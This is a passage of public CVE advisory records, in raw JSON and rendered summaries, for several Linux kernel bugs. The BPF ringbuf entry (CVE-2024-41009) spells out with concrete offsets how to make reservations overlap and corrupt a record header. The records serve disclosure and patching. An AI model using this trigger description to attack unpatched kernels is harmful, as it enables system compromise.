"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.10",
"versionStartIncluding": "5.8",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "In the Linux kernel, the following vulnerability has been resolved:\n\nbpf: Fix overrunning reservations in ringbuf\n\nThe BPF ring buffer internally is implemented as a power-of-2 sized circular\nbuffer, with two logical and ever-increasing counters: consumer_pos is the\nconsumer counter to show which logical position the consumer consumed the\ndata, and producer_pos which is the producer counter denoting the amount of\ndata reserved by all producers.\n\nEach time a record is reserved, the producer that \"owns\" the record will\nsuccessfully advance producer counter. In user space each time a record is\nread, the consumer of the data advanced the consumer counter once it finished\nprocessing. Both counters are stored in separate pages so that from user\nspace, the producer counter is read-only and the consumer counter is read-write.\n\nOne aspect that simplifies and thus speeds up the implementation of both\nproducers and consumers is how the data area is mapped twice contiguously\nback-to-back in the virtual memory, allowing to not take any special measures\nfor samples that have to wrap around at the end of the circular buffer data\narea, because the next page after the last data page would be first data page\nagain, and thus the sample will still appear completely contiguous in virtual\nmemory.\n\nEach record has a struct bpf_ringbuf_hdr { u32 len; u32 pg_off; } header for\nbook-keeping the length and offset, and is inaccessible to the BPF program.\nHelpers like bpf_ringbuf_reserve() return `(void *)hdr + BPF_RINGBUF_HDR_SZ`\nfor the BPF program to use. Bing-Jhong and Muhammad reported that it is however\npossible to make a second allocated memory chunk overlapping with the first\nchunk and as a result, the BPF program is now able to edit first chunk\u0027s\nheader.\n\nFor example, consider the creation of a BPF_MAP_TYPE_RINGBUF map with size\nof 0x4000. Next, the consumer_pos is modified to 0x3000 /before/ a call to\nbpf_ringbuf_reserve() is made. This will allocate a chunk A, which is in\n[0x0,0x3008], and the BPF program is able to edit [0x8,0x3008]. Now, lets\nallocate a chunk B with size 0x3000. This will succeed because consumer_pos\nwas edited ahead of time to pass the `new_prod_pos - cons_pos \u003e rb-\u003emask`\ncheck. Chunk B will be in range [0x3008,0x6010], and the BPF program is able\nto edit [0x3010,0x6010]. Due to the ring buffer memory layout mentioned\nearlier, the ranges [0x0,0x4000] and [0x4000,0x8000] point to the same data\npages. This means that chunk B at [0x4000,0x4008] is chunk A\u0027s header.\nbpf_ringbuf_submit() / bpf_ringbuf_discard() use the header\u0027s pg_off to then\nlocate the bpf_ringbuf itself via bpf_ringbuf_restore_from_rec(). Once chunk\nB modified chunk A\u0027s header, then bpf_ringbuf_commit() refers to the wrong\npage and could cause a crash.\n\nFix it by calculating the oldest pending_pos and check whether the range\nfrom the oldest outstanding record to the newest would span beyond the ring\nbuffer size. If that is the case, then reject the request. We\u0027ve tested with\nthe ring buffer benchmark in BPF selftests (./benchs/run_bench_ringbufs.sh)\nbefore/after the fix and while it seems a bit slower on some benchmarks, it\nis still not significantly enough to matter."
}
],
"providerMetadata": {
"dateUpdated": "2025-05-04T09:19:59.853Z",
"orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"shortName": "Linux"
},
"references": [
{
"url": "https://git.kernel.org/stable/c/be35504b959f2749bab280f4671e8df96dcf836f"
},
{
"url": "https://git.kernel.org/stable/c/0f98f40eb1ed52af8b81f61901b6c0289ff59de4"
},
{
"url": "https://git.kernel.org/stable/c/d1b9df0435bc61e0b44f578846516df8ef476686"
},
{
"url": "https://git.kernel.org/stable/c/511804ab701c0503b72eac08217eabfd366ba069"
},
{
"url": "https://git.kernel.org/stable/c/47416c852f2a04d348ea66ee451cbdcf8119f225"
},
{
"url": "https://git.kernel.org/stable/c/cfa1a2329a691ffd991fcf7248a57d752e712881"
}
],
"title": "bpf: Fix overrunning reservations in ringbuf",
"x_generator": {
"engine": "bippy-1.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"assignerShortName": "Linux",
"cveId": "CVE-2024-41009",
"datePublished": "2024-07-17T06:10:11.351Z",
"dateReserved": "2024-07-12T12:17:45.610Z",
"dateUpdated": "2025-05-04T09:19:59.853Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2021-4441 (GCVE-0-2021-4441)
Vulnerability from cvelistv5
Published
2024-08-22 01:30
Modified
2025-05-04 06:59
Severity ?
VLAI Severity ?
EPSS score ?
Summary
In the Linux kernel, the following vulnerability has been resolved:
spi: spi-zynq-qspi: Fix a NULL pointer dereference in zynq_qspi_exec_mem_op()
In zynq_qspi_exec_mem_op(), kzalloc() is directly used in memset(),
which could lead to a NULL pointer dereference on failure of
kzalloc().
Fix this bug by adding a check of tmpbuf.
This bug was found by a static analyzer. The analysis employs
differential checking to identify inconsistent security operations
(e.g., checks or kfrees) between two code paths and confirms that the
inconsistent operations are not recovered in the current function or
the callers, so they constitute bugs.
Note that, as a bug found by static analysis, it can be a false
positive or hard to trigger. Multiple researchers have cross-reviewed
the bug.
Builds with CONFIG_SPI_ZYNQ_QSPI=m show no new warnings,
and our static analyzer no longer warns about this code.
References
| URL | Tags | ||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
|||||||||||||||||
Impacted products
{
"containers": {
"adp": [
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2021-4441",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2024-09-10T15:34:36.575133Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2024-09-12T17:33:02.937Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
}
],
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Linux",
"programFiles": [
"drivers/spi/spi-zynq-qspi.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThan": "df14d2bed8e2455878e046e67123d9ecb2e79056",
"status": "affected",
"version": "67dca5e580f1e93a66177389981541cac208c817",
"versionType": "git"
},
{
"lessThan": "2efece1368aeee2d2552c7ec36aeb676c4d4c95f",
"status": "affected",
"version": "67dca5e580f1e93a66177389981541cac208c817",
"versionType": "git"
},
{
"lessThan": "3c32405d6474a21f7d742828e73c13e326dcae82",
"status": "affected",
"version": "67dca5e580f1e93a66177389981541cac208c817",
"versionType": "git"
},
{
"lessThan": "b9dd08cbebe0c593c49bf86d2012a431494e54cb",
"status": "affected",
"version": "67dca5e580f1e93a66177389981541cac208c817",
"versionType": "git"
},
{
"lessThan": "ab3824427b848da10e9fe2727f035bbeecae6ff4",
"status": "affected",
"version": "67dca5e580f1e93a66177389981541cac208c817",
"versionType": "git"
}
]
},
{
"defaultStatus": "affected",
"product": "Linux",
"programFiles": [
"drivers/spi/spi-zynq-qspi.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"status": "affected",
"version": "5.2"
},
{
"lessThan": "5.2",
"status": "unaffected",
"version": "0",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.4.*",
"status": "unaffected",
"version": "5.4.182",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.10.*",
"status": "unaffected",
"version": "5.10.103",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.15.*",
"status": "unaffected",
"version": "5.15.26",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.16.*",
"status": "unaffected",
"version": "5.16.12",
"versionType": "semver"
},
{
"lessThanOrEqual": "*",
"status": "unaffected",
"version": "5.17",
"versionType": "original_commit_for_fix"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.4.182",
"versionStartIncluding": "5.2",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.10.103",
"versionStartIncluding": "5.2",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.15.26",
"versionStartIncluding": "5.2",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.16.12",
"versionStartIncluding": "5.2",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.17",
"versionStartIncluding": "5.2",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "In the Linux kernel, the following vulnerability has been resolved:\n\nspi: spi-zynq-qspi: Fix a NULL pointer dereference in zynq_qspi_exec_mem_op()\n\nIn zynq_qspi_exec_mem_op(), kzalloc() is directly used in memset(),\nwhich could lead to a NULL pointer dereference on failure of\nkzalloc().\n\nFix this bug by adding a check of tmpbuf.\n\nThis bug was found by a static analyzer. The analysis employs\ndifferential checking to identify inconsistent security operations\n(e.g., checks or kfrees) between two code paths and confirms that the\ninconsistent operations are not recovered in the current function or\nthe callers, so they constitute bugs.\n\nNote that, as a bug found by static analysis, it can be a false\npositive or hard to trigger. Multiple researchers have cross-reviewed\nthe bug.\n\nBuilds with CONFIG_SPI_ZYNQ_QSPI=m show no new warnings,\nand our static analyzer no longer warns about this code."
}
],
"providerMetadata": {
"dateUpdated": "2025-05-04T06:59:55.248Z",
"orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"shortName": "Linux"
},
"references": [
{
"url": "https://git.kernel.org/stable/c/df14d2bed8e2455878e046e67123d9ecb2e79056"
},
{
"url": "https://git.kernel.org/stable/c/2efece1368aeee2d2552c7ec36aeb676c4d4c95f"
},
{
"url": "https://git.kernel.org/stable/c/3c32405d6474a21f7d742828e73c13e326dcae82"
},
{
"url": "https://git.kernel.org/stable/c/b9dd08cbebe0c593c49bf86d2012a431494e54cb"
},
{
"url": "https://git.kernel.org/stable/c/ab3824427b848da10e9fe2727f035bbeecae6ff4"
}
],
"title": "spi: spi-zynq-qspi: Fix a NULL pointer dereference in zynq_qspi_exec_mem_op()",
"x_generator": {
"engine": "bippy-1.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"assignerShortName": "Linux",
"cveId": "CVE-2021-4441",
"datePublished": "2024-08-22T01:30:04.687Z",
"dateReserved": "2024-08-22T01:26:23.737Z",
"dateUpdated": "2025-05-04T06:59:55.248Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2024-36489 (GCVE-0-2024-36489)
Vulnerability from cvelistv5
Published
2024-06-21 10:18
Modified
2025-05-04 09:11
Severity ?
VLAI Severity ?
EPSS score ?
Summary
In the Linux kernel, the following vulnerability has been resolved:
tls: fix missing memory barrier in tls_init
In tls_init(), a write memory barrier is missing, and store-store
reordering may cause NULL dereference in tls_{setsockopt,getsockopt}.
CPU0 CPU1
----- -----
// In tls_init()
// In tls_ctx_create()
ctx = kzalloc()
ctx->sk_proto = READ_ONCE(sk->sk_prot) -(1)
// In update_sk_prot()
WRITE_ONCE(sk->sk_prot, tls_prots) -(2)
// In sock_common_setsockopt()
READ_ONCE(sk->sk_prot)->setsockopt()
// In tls_{setsockopt,getsockopt}()
ctx->sk_proto->setsockopt() -(3)
In the above scenario, when (1) and (2) are reordered, (3) can observe
the NULL value of ctx->sk_proto, causing NULL dereference.
To fix it, we rely on rcu_assign_pointer() which implies the release
barrier semantic. By moving rcu_assign_pointer() after ctx->sk_proto is
initialized, we can ensure that ctx->sk_proto are visible when
changing sk->sk_prot.
References
| URL | Tags | |||||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
||||||||||||||||||||
Impacted products
| Vendor | Product | Version | ||
|---|---|---|---|---|
| Linux | Linux |
Version: d5bee7374b68de3c44586d46e9e61ffc97a1e886 Version: d5bee7374b68de3c44586d46e9e61ffc97a1e886 Version: d5bee7374b68de3c44586d46e9e61ffc97a1e886 Version: d5bee7374b68de3c44586d46e9e61ffc97a1e886 Version: d5bee7374b68de3c44586d46e9e61ffc97a1e886 Version: d5bee7374b68de3c44586d46e9e61ffc97a1e886 |
||
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-02T03:37:05.240Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/d72e126e9a36d3d33889829df8fc90100bb0e071"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/2c260a24cf1c4d30ea3646124f766ee46169280b"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/335c8f1566d8e44c384d16b450a18554896d4e8b"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/ab67c2fd3d070a21914d0c31319d3858ab4e199c"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/ef21007a7b581c7fe64d5a10c320880a033c837b"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/91e61dd7a0af660408e87372d8330ceb218be302"
}
],
"title": "CVE Program Container"
},
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2024-36489",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2024-09-10T17:09:28.291219Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2024-09-11T17:34:45.616Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
}
],
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Linux",
"programFiles": [
"net/tls/tls_main.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThan": "d72e126e9a36d3d33889829df8fc90100bb0e071",
"status": "affected",
"version": "d5bee7374b68de3c44586d46e9e61ffc97a1e886",
"versionType": "git"
},
{
"lessThan": "2c260a24cf1c4d30ea3646124f766ee46169280b",
"status": "affected",
"version": "d5bee7374b68de3c44586d46e9e61ffc97a1e886",
"versionType": "git"
},
{
"lessThan": "335c8f1566d8e44c384d16b450a18554896d4e8b",
"status": "affected",
"version": "d5bee7374b68de3c44586d46e9e61ffc97a1e886",
"versionType": "git"
},
{
"lessThan": "ab67c2fd3d070a21914d0c31319d3858ab4e199c",
"status": "affected",
"version": "d5bee7374b68de3c44586d46e9e61ffc97a1e886",
"versionType": "git"
},
{
"lessThan": "ef21007a7b581c7fe64d5a10c320880a033c837b",
"status": "affected",
"version": "d5bee7374b68de3c44586d46e9e61ffc97a1e886",
"versionType": "git"
},
{
"lessThan": "91e61dd7a0af660408e87372d8330ceb218be302",
"status": "affected",
"version": "d5bee7374b68de3c44586d46e9e61ffc97a1e886",
"versionType": "git"
}
]
},
{
"defaultStatus": "affected",
"product": "Linux",
"programFiles": [
"net/tls/tls_main.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"status": "affected",
"version": "5.7"
},
{
"lessThan": "5.7",
"status": "unaffected",
"version": "0",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.10.*",
"status": "unaffected",
"version": "5.10.219",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.15.*",
"status": "unaffected",
"version": "5.15.161",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.1.*",
"status": "unaffected",
"version": "6.1.93",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.6.*",
"status": "unaffected",
"version": "6.6.33",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.9.*",
"status": "unaffected",
"version": "6.9.4",
"versionType": "semver"
},
{
"lessThanOrEqual": "*",
"status": "unaffected",
"version": "6.10",
"versionType": "original_commit_for_fix"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.10.219",
"versionStartIncluding": "5.7",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.15.161",
"versionStartIncluding": "5.7",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.1.93",
"versionStartIncluding": "5.7",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.6.33",
"versionStartIncluding": "5.7",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.9.4",
"versionStartIncluding": "5.7",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.10",
"versionStartIncluding": "5.7",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "In the Linux kernel, the following vulnerability has been resolved:\n\ntls: fix missing memory barrier in tls_init\n\nIn tls_init(), a write memory barrier is missing, and store-store\nreordering may cause NULL dereference in tls_{setsockopt,getsockopt}.\n\nCPU0 CPU1\n----- -----\n// In tls_init()\n// In tls_ctx_create()\nctx = kzalloc()\nctx-\u003esk_proto = READ_ONCE(sk-\u003esk_prot) -(1)\n\n// In update_sk_prot()\nWRITE_ONCE(sk-\u003esk_prot, tls_prots) -(2)\n\n // In sock_common_setsockopt()\n READ_ONCE(sk-\u003esk_prot)-\u003esetsockopt()\n\n // In tls_{setsockopt,getsockopt}()\n ctx-\u003esk_proto-\u003esetsockopt() -(3)\n\nIn the above scenario, when (1) and (2) are reordered, (3) can observe\nthe NULL value of ctx-\u003esk_proto, causing NULL dereference.\n\nTo fix it, we rely on rcu_assign_pointer() which implies the release\nbarrier semantic. By moving rcu_assign_pointer() after ctx-\u003esk_proto is\ninitialized, we can ensure that ctx-\u003esk_proto are visible when\nchanging sk-\u003esk_prot."
}
],
"providerMetadata": {
"dateUpdated": "2025-05-04T09:11:17.796Z",
"orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"shortName": "Linux"
},
"references": [
{
"url": "https://git.kernel.org/stable/c/d72e126e9a36d3d33889829df8fc90100bb0e071"
},
{
"url": "https://git.kernel.org/stable/c/2c260a24cf1c4d30ea3646124f766ee46169280b"
},
{
"url": "https://git.kernel.org/stable/c/335c8f1566d8e44c384d16b450a18554896d4e8b"
},
{
"url": "https://git.kernel.org/stable/c/ab67c2fd3d070a21914d0c31319d3858ab4e199c"
},
{
"url": "https://git.kernel.org/stable/c/ef21007a7b581c7fe64d5a10c320880a033c837b"
},
{
"url": "https://git.kernel.org/stable/c/91e61dd7a0af660408e87372d8330ceb218be302"
}
],
"title": "tls: fix missing memory barrier in tls_init",
"x_generator": {
"engine": "bippy-1.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"assignerShortName": "Linux",
"cveId": "CVE-2024-36489",
"datePublished": "2024-06-21T10:18:10.327Z",
"dateReserved": "2024-06-21T10:12:11.459Z",
"dateUpdated": "2025-05-04T09:11:17.796Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2024-26800 (GCVE-0-2024-26800)
Vulnerability from cvelistv5
Published
2024-04-04 08:20
Modified
2025-05-04 12:54
Severity ?
VLAI Severity ?
EPSS score ?
Summary
In the Linux kernel, the following vulnerability has been resolved:
tls: fix use-after-free on failed backlog decryption
When the decrypt request goes to the backlog and crypto_aead_decrypt
returns -EBUSY, tls_do_decryption will wait until all async
decryptions have completed. If one of them fails, tls_do_decryption
will return -EBADMSG and tls_decrypt_sg jumps to the error path,
releasing all the pages. But the pages have been passed to the async
callback, and have already been released by tls_decrypt_done.
The only true async case is when crypto_aead_decrypt returns
-EINPROGRESS. With -EBUSY, we already waited so we can tell
tls_sw_recvmsg that the data is available for immediate copy, but we
need to notify tls_decrypt_sg (via the new ->async_done flag) that the
memory has already been released.
References
| URL | Tags | |
|---|---|---|
Impacted products
{
"containers": {
"adp": [
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2024-26800",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2024-07-31T20:01:08.576744Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2024-07-31T20:01:16.218Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
},
{
"providerMetadata": {
"dateUpdated": "2024-08-02T00:14:13.534Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/f2b85a4cc763841843de693bbd7308fe9a2c4c89"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/81be85353b0f5a7b660635634b655329b429eefe"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/1ac9fb84bc7ecd4bc6428118301d9d864d2a58d1"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/13114dc5543069f7b97991e3b79937b6da05f5b0"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Linux",
"programFiles": [
"net/tls/tls_sw.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThan": "f2b85a4cc763841843de693bbd7308fe9a2c4c89",
"status": "affected",
"version": "cd1bbca03f3c1d845ce274c0d0a66de8e5929f72",
"versionType": "git"
},
{
"lessThan": "81be85353b0f5a7b660635634b655329b429eefe",
"status": "affected",
"version": "13eca403876bbea3716e82cdfe6f1e6febb38754",
"versionType": "git"
},
{
"lessThan": "1ac9fb84bc7ecd4bc6428118301d9d864d2a58d1",
"status": "affected",
"version": "ab6397f072e5097f267abf5cb08a8004e6b17694",
"versionType": "git"
},
{
"lessThan": "13114dc5543069f7b97991e3b79937b6da05f5b0",
"status": "affected",
"version": "8590541473188741055d27b955db0777569438e3",
"versionType": "git"
},
{
"status": "affected",
"version": "3ade391adc584f17b5570fd205de3ad029090368",
"versionType": "git"
}
]
},
{
"defaultStatus": "unaffected",
"product": "Linux",
"programFiles": [
"net/tls/tls_sw.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThan": "6.6.21",
"status": "affected",
"version": "6.6.18",
"versionType": "semver"
},
{
"lessThan": "6.7.9",
"status": "affected",
"version": "6.7.6",
"versionType": "semver"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.6.21",
"versionStartIncluding": "6.6.18",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.7.9",
"versionStartIncluding": "6.7.6",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionStartIncluding": "5.15.160",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "In the Linux kernel, the following vulnerability has been resolved:\n\ntls: fix use-after-free on failed backlog decryption\n\nWhen the decrypt request goes to the backlog and crypto_aead_decrypt\nreturns -EBUSY, tls_do_decryption will wait until all async\ndecryptions have completed. If one of them fails, tls_do_decryption\nwill return -EBADMSG and tls_decrypt_sg jumps to the error path,\nreleasing all the pages. But the pages have been passed to the async\ncallback, and have already been released by tls_decrypt_done.\n\nThe only true async case is when crypto_aead_decrypt returns\n -EINPROGRESS. With -EBUSY, we already waited so we can tell\ntls_sw_recvmsg that the data is available for immediate copy, but we\nneed to notify tls_decrypt_sg (via the new -\u003easync_done flag) that the\nmemory has already been released."
}
],
"providerMetadata": {
"dateUpdated": "2025-05-04T12:54:45.649Z",
"orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"shortName": "Linux"
},
"references": [
{
"url": "https://git.kernel.org/stable/c/f2b85a4cc763841843de693bbd7308fe9a2c4c89"
},
{
"url": "https://git.kernel.org/stable/c/81be85353b0f5a7b660635634b655329b429eefe"
},
{
"url": "https://git.kernel.org/stable/c/1ac9fb84bc7ecd4bc6428118301d9d864d2a58d1"
},
{
"url": "https://git.kernel.org/stable/c/13114dc5543069f7b97991e3b79937b6da05f5b0"
}
],
"title": "tls: fix use-after-free on failed backlog decryption",
"x_generator": {
"engine": "bippy-1.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"assignerShortName": "Linux",
"cveId": "CVE-2024-26800",
"datePublished": "2024-04-04T08:20:28.554Z",
"dateReserved": "2024-02-19T14:20:24.179Z",
"dateUpdated": "2025-05-04T12:54:45.649Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2024-43846 (GCVE-0-2024-43846)
Vulnerability from cvelistv5
Published
2024-08-17 09:22
Modified
2025-05-04 09:27
Severity ?
VLAI Severity ?
EPSS score ?
Summary
In the Linux kernel, the following vulnerability has been resolved:
lib: objagg: Fix general protection fault
The library supports aggregation of objects into other objects only if
the parent object does not have a parent itself. That is, nesting is not
supported.
Aggregation happens in two cases: Without and with hints, where hints
are a pre-computed recommendation on how to aggregate the provided
objects.
Nesting is not possible in the first case due to a check that prevents
it, but in the second case there is no check because the assumption is
that nesting cannot happen when creating objects based on hints. The
violation of this assumption leads to various warnings and eventually to
a general protection fault [1].
Before fixing the root cause, error out when nesting happens and warn.
[1]
general protection fault, probably for non-canonical address 0xdead000000000d90: 0000 [#1] PREEMPT SMP PTI
CPU: 1 PID: 1083 Comm: kworker/1:9 Tainted: G W 6.9.0-rc6-custom-gd9b4f1cca7fb #7
Hardware name: Mellanox Technologies Ltd. MSN3700/VMOD0005, BIOS 5.11 01/06/2019
Workqueue: mlxsw_core mlxsw_sp_acl_tcam_vregion_rehash_work
RIP: 0010:mlxsw_sp_acl_erp_bf_insert+0x25/0x80
[...]
Call Trace:
<TASK>
mlxsw_sp_acl_atcam_entry_add+0x256/0x3c0
mlxsw_sp_acl_tcam_entry_create+0x5e/0xa0
mlxsw_sp_acl_tcam_vchunk_migrate_one+0x16b/0x270
mlxsw_sp_acl_tcam_vregion_rehash_work+0xbe/0x510
process_one_work+0x151/0x370
worker_thread+0x2cb/0x3e0
kthread+0xd0/0x100
ret_from_fork+0x34/0x50
ret_from_fork_asm+0x1a/0x30
</TASK>
References
| URL | Tags | ||||||||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
|||||||||||||||||||||||
Impacted products
| Vendor | Product | Version | ||
|---|---|---|---|---|
| Linux | Linux |
Version: 9069a3817d82b01b3a55da382c774e3575946130 Version: 9069a3817d82b01b3a55da382c774e3575946130 Version: 9069a3817d82b01b3a55da382c774e3575946130 Version: 9069a3817d82b01b3a55da382c774e3575946130 Version: 9069a3817d82b01b3a55da382c774e3575946130 Version: 9069a3817d82b01b3a55da382c774e3575946130 Version: 9069a3817d82b01b3a55da382c774e3575946130 |
||
{
"containers": {
"adp": [
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2024-43846",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2024-09-10T16:07:39.903240Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2024-09-12T17:33:21.861Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
}
],
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Linux",
"programFiles": [
"lib/objagg.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThan": "8161263362154cbebfbf4808097b956a6a8cb98a",
"status": "affected",
"version": "9069a3817d82b01b3a55da382c774e3575946130",
"versionType": "git"
},
{
"lessThan": "22ae17a267f4812861f0c644186c3421ff97dbfc",
"status": "affected",
"version": "9069a3817d82b01b3a55da382c774e3575946130",
"versionType": "git"
},
{
"lessThan": "565213e005557eb6cc4e42189d26eb300e02f170",
"status": "affected",
"version": "9069a3817d82b01b3a55da382c774e3575946130",
"versionType": "git"
},
{
"lessThan": "5adc61d29bbb461d7f7c2b48dceaa90ecd182eb7",
"status": "affected",
"version": "9069a3817d82b01b3a55da382c774e3575946130",
"versionType": "git"
},
{
"lessThan": "1936fa05a180834c3b52e0439a6bddc07814d3eb",
"status": "affected",
"version": "9069a3817d82b01b3a55da382c774e3575946130",
"versionType": "git"
},
{
